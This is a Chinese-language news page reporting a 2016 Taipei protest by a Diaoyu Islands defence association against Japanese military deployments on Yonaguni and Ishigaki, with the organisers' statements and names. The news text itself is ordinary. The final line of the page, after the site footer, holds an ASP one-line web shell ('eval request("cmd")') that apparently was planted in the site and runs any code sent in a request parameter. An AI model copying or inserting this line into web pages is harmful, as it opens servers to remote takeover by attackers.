海外新闻

台中華保釣協會抗議日本在與那國島駐軍

时间:2016-4-26 19:56:09  作者:  来源:中評台灣網  查看:259  评论:0
内容摘要:中評社台北4月20日電(記者 吳政峯)由中華保釣協會率領的近50位民眾,今早前往台北的日本在台交流協會抗議,除了抗議日本在石垣島部署飛彈部隊,也抗議日本在與那國島部署監聽部隊,並呼籲日本撤除相關部隊。   根據了解,日本防衛省於2016年3月在與那國島成立陸上自衛隊基地...
台中華保釣協會抗議日本在與那國島駐軍

中評社台北4月20日電(記者 吳政峯)由中華保釣協會率領的近50位民眾,今早前往台北的日本在台交流協會抗議,除了抗議日本在石垣島部署飛彈部隊,也抗議日本在與那國島部署監聽部隊,並呼籲日本撤除相關部隊。 

  根據了解,日本防衛省於2016年3月在與那國島成立陸上自衛隊基地,並監視附近船艦、飛機。與那國島距離釣魚台約150公里、距台灣蘇澳僅111公里。 

  中華保釣協會表示,釣魚台是中華民國固有領土,堅決反對日本針對中國領土的任何挑釁行為。他們也呼籲國際社會關注和警惕,日本近來突破和平法,大力擴張軍備。 

  抗議書由中華保釣協會包括理事長謝夢林、中華全球華人琉球之友協會理事長連石磊、愛國同心會會長周慶峻、世界華人保釣聯盟會長黃定為(原名黃錫麟)發起。

台中華保釣協會抗議日本在與那國島駐軍

台中華保釣協會抗議日本在與那國島駐軍
世保盟微信公衆号
微信掃一掃二維碼
 
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):